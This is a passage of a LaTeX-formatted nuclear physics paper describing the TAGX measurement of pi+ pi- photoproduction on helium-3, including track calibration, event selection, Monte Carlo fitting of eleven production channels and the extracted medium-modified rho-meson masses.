where an initial set of parameters is used to reconstruct a sample of
well-defined high-momentum tracks. The reconstructed trajectories
yield a new set of parameters, and the procedure is repeated until the
convergence condition is reached, namely that the residual root mean
square (RRMS) improvement over the final two cycles is no better than
0.5\%.
Once a CDC track has been reconstructed, a similar procedure is
followed for the SDC, where first the TDC timing offset is determined,
and subsequently a SDC length-to-time relationship is extracted. This
accomplished, ``best'' SDC tracks are identified, which qualify as
candidate extensions of a selected CDC track. Typically, 2-4 SDC
tracks are selected as possible extensions of a reconstructed CDC
track when all four SDC layers have registered a hit, to a maximum of
8 candidate tracks if one SDC layer is missed. The SDC tracks are
approximated by straight-line segments, since the error in the
position of even the slowest particles which may be expected to result
in valid two-track events is within the 150~$ \mu$m tolerance of the
SDC. Finally, the SDC candidates are matched with the CDC
reconstructed track, by requiring the minimal CDC + SDC RRMS of the
combined track.
The obtained TOF resolution $\sigma_t$ is better than 380~ps
\cite{maru}. The TOF is used for particle identification, as well as
for the determination of the particles' OH position (along the ${\hat
z}$-axis in the TAGX frame as shown in Fig.~\ref{figtgx}).
\section{DATA ANALYSIS}
\label{sec:anal}
The data presented in this report were collected in two periods, with
${^3}He$ and empty-target measurements in each. The superior quality
of the photon beam, and a longer running period, resulted in better
statistics and a higher ratio of $\pi^+\pi^-$ to accidental triggers
for the second phase. This is reflected in the tagger efficiencies and
radiator out/in ratios, defined in Eq.~(\ref{norm}), which during the
later part of the experiment were generally improved. A total of
16,366 $\pi^+\pi^-$ events have been identified from the analysis of
two-track events, comprising 73\% of the total number of reconstructed
events, the remaining being of three (23\%) or more tracks
($<$4\%). With the extraction of the $\pi^+\pi^-$ yield Y, the total
cross section $\sigma_T$ is determined from the relation
\begin{equation}
\sigma_T = {Y\over{N_TN_\gamma\eta_{\pi^+\pi^-}\eta_{daq}}}
\label{yield}
\end{equation}
where $N_T$ (nuclei/cm$^2$) is the ${^3}He$ target density seen by the
photon beam, and $N_\gamma$ is the incident photon flux. The
efficiencies $\eta_{daq}$ and $\eta_{\pi^+\pi^-}$ account for the
data-acquisition livetime and $\pi^+\pi^-$ detection efficiencies.
The latter, which is in the range of 2.7-6.8\% for the $\rho^0$
channels, is determined by dedicated MC routines and is
reaction-channel specific (see Ref.~\cite{maru}).
\subsection{Empty target background}
\label{sec:ets}
In Section~\ref{sec:pb}, the extraction of the tagger efficiencies,
and the normalization of the tagger scalers to reflect the number of
photons incident on the target, were discussed. These are utilized in
determining the appropriate factor by which empty-target spectra are
scaled prior to their subtraction from the corresponding
${^3}He$-target spectra, for the removal of target background
counts. The procedure is briefly summarized in the following steps.
At regular intervals throughout each of the ${^3}He$-target and
empty-target running periods, the lead-glass $\breve{C}$erenkov
counter is employed in dedicated reference runs to determine the
quantities $\eta_\imath$ and ${\cal R}_\imath$, as described in
Section~\ref{sec:pb}. The total number of photons incident on the
target per experiment is extracted as the sum of the raw scaler counts
T$_\imath$, recorded for each run, corrected by the efficiency and
out/in ratios for that run, according to Eq.~(\ref{norm}), and
weighted by the normalized energy distribution of the scattered
electrons. In particular, $\eta_\imath$ and ${\cal R}_\imath$ for each
run are calculated from the corresponding quantities of the reference
runs, on the assumption that they vary linearly with the raw scaler
counts accumulated between runs. The ratios of photon fluxes between
each ${^3}He$-target and its corresponding empty-target experiment
yield the scaling factors by which the latter are normalized prior to
subtraction from the former. The x-coordinate spectrum of the
two-pion crossing vertex after background subtraction, indicative of
the accuracy of this procedure, is shown in Fig.~\ref{figtv}.
\subsection{Experimental observables}
\label{sec:obs}
The calibration procedure, discussed in Section~\ref{sec:daq}, allows
the extraction of the planar momentum $p_{xy}$, the polar emission
angle in the median plane $\varphi$, the planar trajectory length
$l_{xy}$ from the SDC + CDC particle tracking, and the time of flight
and z-coordinate (OH position) from the IH and OH scintillators:
\begin{eqnarray}
&&t = {1\over 2}\left(t^{up}_{OH}+t^{down}_{OH}\right) - t_{IH}\nonumber \\
&&z = {1\over 2}\left(t^{down}_{OH}-t^{up}_{OH}\right)v_{eff}
\label{ihoh}
\end{eqnarray}
The up-down indices correspond to the timing measurements at the two
ends of the OH, and $v_{eff}$ is the effective light transmission
velocity in the scintillator material. These yield the primary
observables (Figs.~\ref{figtvm},\ref{figkin})
\begin{eqnarray}
&&\theta_{dip} = tan^{-1}\left({z\over l_{xy}} \right)\nonumber \\
&&p = p_{xy}/cos\,\theta_{dip}\nonumber \\
&&l = l_{xy}/cos\,\theta_{dip}\nonumber \\
&&\beta = l/ct\nonumber \\
&&m = p/\beta\gamma c\nonumber \\
&&\theta_{sc} = cos^{-1}\left( cos\varphi\,{p_{xy}\over p} \right)
\label{pkin}
\end{eqnarray}
where $\theta_{dip}$ is the out-of-plane dip angle, $p$ and $l$ the
total momentum amplitude and three-dimensional trajectory length, and
$\theta_{sc}$ the scattering angle with respect to the incident beam
(Fig.~\ref{figkin}). A left-right asymmetry noted in the scattering
angle $\theta_{sc}$ spectrum (Fig.~\ref{figkin}d) has been reproduced
in the MC simulations.
A coincidence of two charged particles, one on either side of the
photon beam, signifies the occurence of an event
(Section~\ref{sec:daq}). A series of tests and cuts in the data set
subsequently eliminate all but the $\pi^+\pi^-$ pairs. In particular,
first the time-of-flight versus planar momentum spectra are used for
particle identification (PID, Fig.~\ref{figtvm}). The great majority
of events including a proton or e$^\pm$ are thus discarded. Cuts on
the tagger TDC spectra reject events induced by spurious photons, not
corresponding in timing with the beam pulse. Last, pairs with
low-confidence tracks (large RRMS), or whose vertex falls outside the
target area (Fig.~\ref{figsdc}) are eliminated, thus completing a
first-level selection based on directly measured observables.
For the two-track events that have cleared the tests above, and have
been identified as $\pi^+\pi^-$, additional kinematical observables
are calculated. At this stage, the few surviving two-track events
involving a proton or e$^\pm$ that had been previously misidentified
as $\pi^+\pi^-$ by the PID cuts are eliminated as well. The calculated
observables include the dipion invariant mass m$_{\pi^+\pi^-}$, the
laboratory production angle of the dipion system $\Theta_{IM}$, the
missing mass m$_{miss}$ and momentum p$_{miss}$, the $\pi^+$-$\pi^-$
laboratory opening angle $\vartheta_{\pi^+\pi^-}$, and the $\pi^+$
production angle in the dipion center of mass $\theta^*_{\pi^+}$,
employed as variables in the MC fitting procedure
(Section~\ref{sec:mc}).
Among these observables, the production angle for either one of the
two pions in the dipion center-of-mass frame, for example
$\theta^*_{\pi^+}$, is singular as a direct experimental observable
which, without the aid of simulations or assumptions, points to the
presence of the $\rho^0$ production channel well below the nominal
threshold energy. This is discussed next.
\subsection{The $J=1$ signature of the $\rho^0$}
\label{sec:le1}
Among the dominant production channels participating in $\pi^+\pi^-$
photoproduction in the E$_\gamma \sim$ 1 GeV region
(Section~\ref{sec:pcs}), the $\rho^0 \rightarrow \pi^+\pi^-$ channel
alone results in the two pions being produced at a single reaction
vertex with the characteristic $J = 1$ angular correlation from the
decay of the $\rho^0$. In the dipion center-of-mass frame this
translates into a pure cos$^2\theta^*_{\pi^+}$ distribution, where
$\theta^*_{\pi^+}$ is the $\pi^+$ production angle with respect to the
dipion momentum, the direction defined by the latter in the laboratory
frame. On the assumption of a slowly-varying $\pi^+\pi^-$ background
interfering with the $\rho^0$ amplitude, the angular distributions are
expected to be symmetric around $\theta^*_{\pi^+}$ = 90$^\circ$ for
dipion cm energies near the mass of the $\rho^0$ meson, where the
$\rho^0 \rightarrow \pi^+\pi^-$ amplitude peaks. Away from the
$\rho^0$ mass, the resonant amplitude vanishes, and the background
processes dictate the shape of the spectra \cite{rhob}. Thus, above
and below the $\rho^0$-meson mass, the angular distribution is
expected to regain a quasi-isotropic shape due either to the
uncorrelated pions produced at two or more reaction vertices, this
being the case for the majority of the participating background
processes, or from s-wave correlated pions, possibly produced from the
decay of the $\sigma$ meson (Section~\ref{sec:pcs}).
This technique, of $\rho^{0,\pm}$ identification via the study of the
pion-scattering angle in the dipion cm frame, has been extensively
used in many previous analyses (e.g. Ref.~\cite{rhoa}). The
$\theta^*_{\pi^+}$ distribution spectrum, based on the above, is
expected to be well-described as A + B\,cos$^2\theta^*_{\pi^+}$, in
the vicinity of the dipion invariant mass matching that of the
$\rho^0$ meson, where the $\rho^0 \rightarrow \pi^+\pi^-$ amplitude
peaks.
The $\pi^+\pi^-$ events in the range of 400-800 MeV/c$^2$ in dipion
invariant mass have been divided in four 100 MeV/c$^2$ bins, which is
the finest binning allowed by the data statistics. An additional cut,
determined from the MC simulations of the TAGX $\rho^0$ detection
efficiency and kinematical considerations, eliminates those
$\pi^+\pi^-$ events with too small an opening angle to have been the
outcome of back-to-back production at a single reaction vertex (see
Section~\ref{sec:fp}). The latter cut results in a further 9-10\%
reduction in the total number of $\pi^+\pi^-$ events in the 400-800
MeV/c$^2$ dipion invariant-mass region, affecting only events from
background processes, effectively boosting the $\rho^0 \rightarrow
\pi^+\pi^-$ amplitude relative to the background (Fig.~\ref{figcos}).
The 500-600, and 600-700 MeV/c$^2$ regions (Figs.~\ref{figcos}b,c)
clearly demonstrate the $J=1$ fingerprint of the $\rho^0$ meson
decay. The deviation from cos$^2\theta^*_{\pi^+}$ toward $\pm$1 is
reproduced in MC simulations of the $\rho^0 \rightarrow \pi^+\pi^-$
process, and it is shown to be the effect of the TAGX detection
efficiency, stemming from the two-track detection requirement (see
Section~\ref{sec:fp} and Fig.~\ref{figacc}). The quasi-resonant
$\rho^0 \rightarrow \pi^+\pi^-$ amplitude over the 500-700 MeV/c$^2$
dipion invariant-mass range points to a substantially reduced $\rho^0$
mass {\it beyond} the trivial apparent lowering, which is the artifact
of probing the lower tail of the $\rho^0$ mass distribution with
low-energy photons (Section~\ref{sec:int}).
\section{SIMULATIONS}
\label{sec:mc}
The MC simulations constitute an integral part of the data analysis by
determining the process-dependent detection efficiencies of the
spectrometer, guiding the assignment of the weight to each of the
contributing production mechanisms, and, ultimately, leading to the
extraction of the medium-modified $\rho^0$ mass.
The steps involved in the simulations and fitting algorithm can be
outlined as follows:
\begin{itemize}
\item Eleven individual $\pi^+\pi^-$ production channels are coded
into MC generators (Section~\ref{sec:pcs}). These eleven processes are
considered to account for the full $\pi^+\pi^-$ photoproduction yield
in the $\gamma + {^3}He$ reaction. Twelve distributions of six
kinematical observables, with cuts aiming to separate the bound
${^3}He$ from the dissociated $ppn$ final state, are simulated for
each production channel and each of four $\Delta$E$_\gamma$ energy
bins (Section~\ref{sec:fp}). The analysis of the MC events is
identical to that of the experimental data, and yields the
process-dependent spectrometer acceptance (Section~\ref{sec:fp}).
\item The simulated spectra for nine of the above elementary processess
(Section~\ref{sec:pcs}), including background and $\rho^0$ production
channels with the nominal m$_{\rho^0}$=770 MeV/c$^2$ mass, are
combined. The twelve spectra of each process are adjusted with a
common strength parameter within each of the four $\Delta$E$_\gamma$
bins before being added together. Subsequently, all twelve simulated
spectra are fitted simultaneously to the corresponding experimental
ones, yielding the nine strength parameters independently for each
$\Delta$E$_\gamma$ bin. From the latter, and the spectrometer
acceptances, total cross sections are extracted for each of the nine
production processes, and compared with independently established
ones. Adjustments to the starting values and fitting constraints are
made in iterative steps until satisfactory agreement is reached.
\item The procedure is repeated for all eleven production channels,
including the addition of two more processes (Section~\ref{sec:pcs})
with a modified $\rho^0$ mass m$^*_{\rho^0}$ in the range 500-725
MeV/c$^2$, but common for both the ${^3}He$ and breakup $ppn$ final
states. The $\rho^0$ mass corresponding to the best fit for each
$\Delta$E$_\gamma$ bin is quoted in this report as the medium-modified
m$^*_{\rho^0}$ mass (Section~\ref{sec:mmm}).
\item Exploratory fits are attempted, decoupling the ${^3}He$ and breakup
$ppn$ final states with respect to m$^*_{\rho^0}$, as well as
modifying the width $\Gamma^*_{\rho^0}$ (Section~\ref{sec:int}).
\end{itemize}
The principal aspects of this algorithm are elaborated below.
\subsection{Production channels}
\label{sec:pcs}
Several mechanisms are known to contribute to $\pi^+\pi^-$
photoproduction. Recent experiments for photon energies between 450 -
800 MeV at MAMI, using the large-acceptance spectrometer DAPHNE and
high-intensity tagged photon beams, and in the range 1 - 2.03 GeV with
the SAPHIR detector at ELSA \cite{saphir1}, have provided accurate
measurements of the reaction $\gamma p \rightarrow \pi^+\pi^- p$
\cite{saphir2,mami1,mami2}. These have motivated several theoretical
models, which concur in their interpretation of the data as
$\pi^+\pi^-$ photoproduction predominantly through the
$\pi\Delta(1232) \rightarrow \pi^+\pi^- N$, and the $N^*(1520)
\rightarrow \pi\Delta \rightarrow \pi^+\pi^- N$ channels
\cite{ppp1,ppp2,ppp3}. In the nuclear medium, the propagators of baryonic
resonances require renormalization, and, in addition, many-body
effects caused by pion rescattering (FSI) are known to interfere with
the lowest-order reaction mechanism of two-pion photoproduction on the
nucleon \cite{ssk}. These medium modifications affect both the
strength and the peak position of the cross-section spectra for the
various interfering channels, relative to the corresponding processes
on a free nucleon. Nonetheless, the $\Delta$(1232) and N$^*$(1520)
resonances remain the leading channels in photon-induced reactions in
the nuclear medium, as has recently been verified by total
photoabsorption cross-section measurements on nuclei
\cite{bianchi}. In the latter, substantial contributions were also
attributed to the nucleonic excitations P$_{11}$(1440) and
S$_{11}$(1535), primarily, which largely overlap with the N$^*$(1520)
resonance in medium-modified mass and width.
The double-$\Delta$ is another channel that has been verified in
photoabsorption measurements on the deuteron \cite{dd1,dd2}, a process
that has also been modelled theoretically \cite{on}. The photon is
absorbed on two nuclei, exciting $\Delta$(1232) resonances, in the
reaction $\gamma NN \rightarrow \Delta\Delta$, which subsequently
decay to produce $\pi^+\pi^-$ pairs.
In addition, three-pion $\pi^+\pi^-\pi^0$ production, associated with
${^3}He$ disintegration, is kinematically feasible in the energy range
probed by the present experiment. However, the limited out-of-plane
detector acceptance coupled with appropriate missing-mass cuts
minimize the contributions of this mechanism. The experimental
measurements available are sparse for this process in the energy
regime of interest \cite{saphir2,saphir3,ppp}.
Other possible contributions to the background $\pi^+\pi^-$ count,
which, however, were not found to improve the quality of the fit and
are presently not included in the simulations, may come from
non-resonant three-, four-, and five-body phase space, corresponding
to the ${^3}He$ remaining intact, or breaking-up into $dp$ and $ppn$
respectively. These multi-body phase-space processes are governed
solely by energy and momentum conservation, each with a constant
transition matrix element \cite{sod}, and, loosely speaking,
accomodate in an average sense all the remaining possible production
channels which are too weak to be individually identified.
The contributions of the mechanisms discussed so far have been
previously considered in MC simulations, in connection with TAGX
$\pi^+\pi^-$ photoproduction data \cite{watts,lolos,hub}. In
Ref.~\cite{lolos} in particular, where $\pi^+\pi^-$ photoproduction
via the $\rho^0$ channel was first considered, the background
processes
$$
\gamma + ^3He \rightarrow \left\{ \begin{array}{l} {\left.
\begin{array}{l}
{i)\ \ \ \Delta\pi(NN)_{sp}}\\
{ii)\ \ N^*(1520)(NN)_{sp} \rightarrow \Delta(1232)\pi(NN)_{sp}}\\
{iii)\ N^*(1520)\pi(NN)_{sp}}\\
{iv)\ \ \Delta\Delta N_{sp}} \end{array} \right\} \rightarrow ppn\pi^+\pi^-}\\
\ {v)\ \ \ ppn\pi^+\pi^-\pi^0}
\end{array} \right. \,
$$
were included in simulations of non-$\rho^0$ $\pi^+\pi^-$
contributions, as well as final-state interactions (FSI) following the
$\rho^0$ decay (see process $ix)$ below). The index $sp$ signifies
spectator nucleons. The empirical values from Ref.~\cite{bianchi} were
used for the $\Delta$(1232) mass and width and for the N$^*$(1520)
mass, but the fit improved with the N$^*$(1520) width doubled relative
to Ref.~\cite{bianchi}. This {\it ad hoc} increase effectively
incorporates the near-by resonances P$_{11}$(1440) and S$_{11}$(1535),
which largely overlap with the N$^*$(1520), but cannot be resolved
within the sensitivity of the data. Alternate fits were performed with
the N$^*$(1520) replaced by the Roper N$^*$(1440) and including
five-body phase space. The two methods yield comparable masses for the
$\rho^0$, but the former is preferred as it results in a better fit.
Additional improvements in the fitting procedure, relative to the
analysis of Refs.~\cite{watts,lolos,hub}, include the modification of
the MC generators to account for the angular momentum of all $\rho^0
\rightarrow \pi^+\pi^-$ and intermediate $\Delta$-resonance
channels. Furthermore, motivated by recent $\pi\pi$ phase-shift
analyses which increasingly show evidence of s-wave contributions from
the $\sigma$ meson, the quasifree $\sigma$-decay channel
$$
vi)\ \ \ \gamma + {^3H}e \rightarrow \sigma ppn \rightarrow
\pi^+\pi^- \,{^3H}e
$$
has been added, with the $\sigma$ mass and width parameters from
Ref.~\cite{sigma}.
Last, $\rho^0 \rightarrow \pi^+\pi^-$ photoproduction has been
simulated by means of five distinct generators, namely
$$
\gamma + ^3He \rightarrow \left\{ \begin{array}{l}
{\left. \begin{array}{l}
{vii)\ \ \rho^0 + {^3H}e \rightarrow \pi^+\pi^- \,{^3H}e}\\
{viii)\ \rho^0ppn \rightarrow \pi^+\pi^-ppn}\\
{ix)\ \ \ \rho^0ppn \rightarrow \pi^+\pi^-ppn + (FSI)}
\end{array} \right\} \ \ \ \ \ m_{\rho^0}\,=\,770\, MeV/c^2}\\
{\left. \begin{array}{l}
{x)\ \ \ \ \rho^0 + {^3H}e \rightarrow \pi^+\pi^- \,{^3H}e}\\
{xi)\ \ \ \rho^0ppn \rightarrow \pi^+\pi^-ppn}
\end{array} \right\} \ \ 500\, MeV/c^2\, \le m^*_{\rho^0} \le \,725\, MeV/c^2}
\end{array} \right.
$$ where to channels $vii)$-$ix)$ and $x)-xi)$ are ascribed $\rho^0$
decay outside, and inside the nuclear medium, respectively, the latter
probing the medium effect on the $\rho^0$ mass. The breakup channels
have the reaction taking place on a single nucleon, subject to its
Fermi motion, with the remaining two nucleons as spectators. Final
state $\pi N$ interaction (FSI) with one of the two spectator nucleons
is included in channel $ix)$.
\subsection{Fitting procedure}
\label{sec:fp}
In modelling $\pi^+\pi^-$ photoproduction on nuclei, the distributions
of five kinematical observables (Section~\ref{sec:obs}) were
simultaneously fitted to the data in Refs.~\cite{watts,lolos,hub}. These are
$$
\begin{array}{l}
{1.\ \ {\rm the\ dipion\ invariant\ mass\ }m_{\pi^+\pi^-}}\\
{2.\ \ {\rm the\ laboratory\ production\ angle\ of\ the\ dipion\ system\ }
\Theta_{IM}}\\
{3.\ \ {\rm the\ missing\ mass\ }m_{miss}}\\
{4.\ \ {\rm the\ missing\ momentum\ }p_{miss}}\\
{5.\ \ {\rm the\ }\pi^+ -\pi^- {\rm laboratory\ opening\ angle\ }
\vartheta_{\pi^+\pi^-}}
\end{array}
$$
to which one additional kinematical observable has presently been added
(Section~\ref{sec:le1}), namely
$$
6.\ \ {\rm the\ } \pi^+ {\rm production\ angle\ in\ the\ dipion\ rest\ frame\ }
cos\theta^*_{\pi^+}\ .
$$
Moreover, in Ref.~\cite{watts} it was determined that dividing the
data sample in $\Delta E_\gamma$ = 80 MeV bins provided the optimal
compromise between the presumed constancy of the reaction matrix
elements, implicit in the MC simulations which only depend on the
kinematics, and the requirement of sufficient statistics. The $\Delta
E_\gamma$ partitioning of the data is necessary in order to account
for the varying energy dependence of the $\pi^+\pi^-$ cross sections
from each of the individual production mechanisms. The 80~MeV binning
in E$_\gamma$ has been retained, resulting in four sectors of the data
sample from 800 to 1120 MeV, to be referred by their respective
central E$_\gamma$ values (840, 920, 1000, and 1080 $\pm$40~MeV).
The addition of the cos$\theta^*_{\pi^+}$ distribution, though not
noticeably affecting the overall quality of the fit, nonetheless
provides an additional physical constraint which aids the MC fitting
algorithm to converge to a more realistic solution. In particular,
this kinematical observable uniquely captures a characteristic feature
of the contributing mechanisms, which may be classified into three
types according to their respective dependence on
cos$\theta^*_{\pi^+}$ (Fig.~\ref{figacc}):
\begin{itemize}
\item The channel of interest, diffractive $\rho^0\rightarrow
\pi^+\pi^-$, is unique in producing two p-wave correlated pions. The
spectrometer response to this mechanism is consistent with the $J=1$
dependence, and the deviation from the anticipated
cos$^2\theta^*_{\pi^+}$ distribution towards $\sim \pm$1 reflects the
acceptance cut, stemming from the kinematical conditions, set-up
geometry, and the two-pion detection requirement (compare the solid
curve of Fig.~\ref{figacc} with Figs.~\ref{figcos}b,c).
\item The background hadronic channels $i)-iv)$ of
Section~\ref{sec:pcs} produce two uncorrelated pions at two or more
reaction vertices. The angular correlations of these pions are
averaged out over 4$\pi$ sr in simulations, resulting in featureless
cos$\theta^*_{\pi^+}$ spectra. The spectrometer geometry, however,
suppresses the pion acceptance away from cos$\theta^*_{\pi^+}$=0 (see
e.g. the dashed curve of Fig.~\ref{figacc} for the single-$\Delta$
production channel). This is a consequence of the fact that channels
$i)-iv)$ involve the decay of intermediate baryonic resonances,
accompanied by energetic nucleons.
\item Three-pion production and the quasi-elastic $\sigma$ process,
$v)$ and $vi)$ of Section~\ref{sec:pcs}, are characterized by
featureless cos$\theta^*_{\pi^+}$ acceptances, as no energetic
nucleons are emitted (dotted curve of Fig.~\ref{figacc}).
\end{itemize}
The combination of improvements relative to the analysis of
Ref.~\cite{lolos}, namely, accounting for the angular momentum in the
$\Delta$ and $\rho^0$ channels, and imposing additional physical
constraints via the new kinematical observable cos$\theta^*_{\pi^+}$,
resulted in a more accurate treatment of the process-dependent
spectrometer acceptances.
The data have been subjected to two additional cuts, one of which
enhances the $\rho^0$ relative to the background channels, and the
other facilitates the separation of the bound ${^3H}e$ from the
breakup $ppn$ final states. The former is a $\pi^+\pi^-$ opening-angle
cut determined from MC simulations, namely 70$^\circ \le
\vartheta_{\pi^+\pi^-} \le$ 180$^\circ$, eliminating two-pion events
that could not have been produced back-to-back from the $\rho^0$ decay
(Fig.~\ref{figcuts}a). This cut is most effective at the higher end of
photon energies covered by the experiment, where the $\rho^0$
identification becomes difficult by an increasingly deteriorating
$\rho^0$-to-background ratio with increasing E$_\gamma$. The latter
cut (Fig.~\ref{figcuts}b) separates events with missing mass in the
proximity of the target mass $m_{{^3H}e}\,\approx\,2.8\ GeV/c^2$
(i.e. $2700\ MeV/c^2 < m_{miss} < 2865\ MeV/c^2$), from those
associated with the breakup of the target nucleus to $ppn$ in the
final state ($2865\ MeV/c^2 < m_{miss} < 3050\ MeV/c^2$). The
combination of the two types of cuts is applied to three of the
kinematical observables, resulting in six additional spectra, besides
the unselected $\pi^+\pi^-$ distributions 1-6 enumerated
earlier. These are:
$$
\begin{array}{l}
{\left. \begin{array}{l}
{7.\ \ m_{\pi^+\pi^-}}\\
{8.\ \ p_{miss}}\\
{9.\ \ cos\theta^*_{\pi^+}}
\end{array} \right\} \ \ \rho^0- {\rm enhanced\ low\ missing-mass\ data}}\\
{ }\\
{\left. \begin{array}{l}
{10.\ m_{\pi^+\pi^-}}\\
{11.\ p_{miss}}\\
{12.\ cos\theta^*_{\pi^+}}
\end{array} \right\} \ \ \rho^0- {\rm enhanced\ high\ missing-mass\ data}}
\end{array}
$$
While the contributing $\rho^0$ photoproduction mechanisms may not be
experimentally distinguishable (Section~\ref{sec:intro}), the cuts aim
at partitioning the data in biased samples favoring processes which
are more prone to probing either the nuclear mean-field effect
(i.e. coherent and exclusive quasifree photoproduction via the
distributions 7-9), or a possible nucleonic effect (i.e. the breakup
quasifree channel via the spectra 10-12). The three kinematical
observables which were subjected to the cuts, namely, the dipion
invariant mass, missing momentum, and dipion-cm $\pi^+$
production-angle, were selected empirically from the kinematical
observables 1-6 as more sensitive to the $\rho^0$ mass, and therefore
more susceptible to possible medium effects.
With a range of m$^*_{\rho^0}$ values, traversing the region 500-725
MeV/c$^2$, and each value kept common for the unselected, as well as
the ${^3H}e$ and $ppn$ selected data, the twelve simulated spectra
were fitted simultaneously to the corresponding experimental ones, by
minimizing a standard $\chi^2$ function with the strengths of the
eleven individual processes $i)-xi)$ (Section~\ref{sec:pcs}) as the
fit parameters. The four $\Delta$E$_\gamma = 80$~MeV bins were fitted
independently. The optimal m$^*_{\rho^0}$ for each bin is that
corresponding to the minimum value of the $\chi^2$ function
(Section~\ref{sec:mmm}).
In summary, the MC fitting procedure satisfies the following requirements:
\begin{itemize}
\item The $\Delta$E$_\gamma$ = 80 MeV binning restricts the energy
dependence of the participating processes to the narrowest bin
possible without loss of sufficient statistics.
\item The six kinematical observables utilized in the fitting are
complementary, and account for different physical attributes of the
data sample. This imposes far more stringent constraints than an
analysis based on only the invariant mass distribution, as in the case
of the CERES data \cite{ceres}.
\item The simultaneous fitting of selected and unselected data aims at
isolating a strong signal from data samples most responsive to
possible $\rho^0$ mass modifications, while also incorporating in the
fit the bulk of $\pi^+\pi^-$ events produced in processes less
sensitive to such effects.
\end{itemize}
The outcome of this procedure is the medium-modified $\rho^0$ meson mass.
\section{RESULTS}
\label{sec:data}
\subsection{Quality of fit and uncertainties}
\label{sec:mmm}
Beyond the statistical and other experimental uncertainties which are
folded into the calibration and analysis of the measured $\pi^+\pi^-$
yields, additional sources of uncertainty are generated by the MC
simulations and fitting algorithm. i) The MC event generators depend
exclusively on kinematical parameters, neglecting other aspects of the
interaction. As an example, the channel $\gamma + {^3}He \rightarrow
(np)_{sp}\Delta\pi$ is modelled as $\gamma +{^3}He \rightarrow
(np)_{sp} \Delta^{++}\pi^-$, normalized by an isospin scaling factor
to account for the remaining hadronic charge states. This introduces
an uncertainty in the amplitude of this process, similar to which are
also present in other background hadronic channels. ii) Independent
total cross-section measurements of the constituent reactions, serving
to anchor their relative strengths in the full $\pi^+\pi^-$ production
process, are sparse (e.g. the quasi-elastic $\sigma$ channel). The
strength for some of the individual channels was inferred from
indirect sources. iii) Additional quasifree channels and independent
measurements to fix their strength are required in order to extract
precision cross sections for the background hadronic channels from the
data, processes which merit attention on their own behalf. This may
become possible following the analysis of three charged-particle
events from TAGX experiments, currently in progress.
Despite the caveats above, the medium-modified $\rho^0$ masses
extracted from the MC fitting procedure have remained remarkably
stable with respect to variations of the strength parameters of the
constituent reactions, within each of the four $\Delta E_\gamma$
bins. This is all the more significant considering that the data are
fit simultaneously for twelve spectra of six kinematical
observables. In conjunction with the direct $J=1$ fingerprint
discussed earlier, the insensitivity of the fit, within physical
constraints, adds confidence to the premise that the medium-modified
$\rho^0$-meson masses extracted from the MC simulations reflect
genuine features of the data sample.
Following the procedure discussed in Section~\ref{sec:mc}, several MC
fits have been performed with m$^*_{\rho^0}$ taking on values from a
mesh in the range 500-725 MeV/c$^2$ (Fig.~\ref{figch2}). The steepness
of the $\chi^2$-vs-m$^*_{\rho^0}$ curve is indicative of the
sensitivity of the data sample to $\rho^0$ mass modifications, within
each of the four $\Delta E_\gamma$ bins. Using this as a qualitative
criterion, the fitting of the 840 and 920 MeV samples, and to a lesser
extent of the 1000 MeV sample, have converged to a ``best''
m$^*_{\rho^0}$, whereas the fit for the 1080 MeV bin is essentially
insensitive to variations of m$^*_{\rho^0}$ (Fig.~\ref{figch2}).
For each of the 840, 920, and 1000 MeV bins individually, the MC fits
(dark circles, triangles and squares respectively in
Fig.~\ref{figch2}) yield the best m$^*_{\rho^0}$ and an estimate of
its uncertainty. This is achieved as follows: a) The uncertainty
$\sigma_{\chi^2}$ is assumed common within each bin. This is justified
by the fact that both the data set and the reaction matrix elements
used by the MC algorithm are common within each bin. b) A polynomial
expansion of the MC $\chi^2$ about (m$^*_{\rho^0}$-m$_0$), with m$_0$
in the proximity of the apparent minimum, is assumed to describe well
the dependence of the former on the latter. Subsequently a new
${\chi'}^2$ minimization yields the rank and the coefficients of the
polynomial. A third order polynomial gives the best result for the two
lower-energy bins, and it is also assumed to provide the best
description of the parent population for the 1000 MeV data
sample. This procedure also leads to conservative estimates for
$\sigma_{\chi^2}$, in particular 0.019, 0.013 and 0.017 for the 840,
920, and 1000 MeV bins, respectively. c) The polynomial coefficients
and $\sigma_{\chi^2}$ estimates are used to derive the optimal
m$^*_{\rho^0}$ and an estimate of its uncertainty for each bin. These
are:
\begin{itemize}
\item m$^*_{\rho^0}$ = 642$\pm$40 MeV/c$^2$, 800 MeV$\le$E$_\gamma$$\le$880 MeV
\item m$^*_{\rho^0}$ = 669$\pm$32 MeV/c$^2$, 880 MeV$\le$E$_\gamma$$\le$960 MeV
\item m$^*_{\rho^0}$ = 682$\pm$56 MeV/c$^2$, 960 MeV$\le$E$_\gamma$$\le$1040 MeV
\end{itemize}
The improvement in the medium-modified over the unmodified $\rho^0$
mass fits is evidenced to varied degrees in all the fitted
spectra. The order of the improvement is illustrated for the full
(unselected) data in the dipion invariant-mass, $\pi^+$-$\pi^-$
laboratory opening-angle, and missing-momentum distributions for the
840$\pm$40 MeV and 920$\pm$40 MeV bins, which are most affected by
modifications of the $\rho^0$ mass (Figs.~\ref{fig840},\ref{fig920}).
The dipion invariant mass spectra are not the most sensitive to
variations of the $\rho^0$ mass, among the twelve distributions of six
kinematical observables that were employed in the fit. This is seen,
for example, in comparing the improvement between the unmodified- and
modified-mass dipion invariant-mass with the opening-angle and
missing-momentum spectra (Figs.~\ref{fig840},\ref{fig920}), where the
latter two observables are seen to display a greater sensitivity. This
underlines the advantage of a fitting procedure that utilizes multiple
complementary kinematical observables as opposed to only the invariant
mass, thus capturing additional attributes of the physical process,
and resulting in a more realistic analysis.
\subsection{Discussion}
\label{sec:int}
The $J$=1 angular momentum signal, discussed in Section~\ref{sec:le1}
(Fig~\ref{figcos}), as well as the dipion invariant mass spectra from
the fit (e.g. Figs.~\ref{fig840}a,d for E$_\gamma$=840 MeV), would
appear to indicate medium-modified $\rho^0$ masses which are actually
{\it lower} than the values quoted earlier (e.g. compare
m$^*_{\rho^0}$=642$\pm$40 MeV/c$^2$ for the 840 MeV bin with the
centroid suggested by the dashed curve of Fig.~\ref{fig840}a). This
apparent discrepancy is misleading, and has its origin in a trivial
effective mass lowering driven by phase-space, most pronounced at
lower photon energies. This is due to the fact that, at low photon
energies, only the lower wing of the $\rho^0$ mass distribution is
kinematically accessible (e.g. Fig.~\ref{figims} for E$_\gamma$=840
MeV and the $\rho^0ppn$ final state). The shape and the centroid of
the mass distribution for the resulting $\rho^0$ mesons is primarily
dictated by the kinematics, and to a lesser extent by the spectrometer
acceptance for the particular $\rho^0$-producing process. This effect
is implicit in the MC generated $\rho^0$ spectra, and it is by no
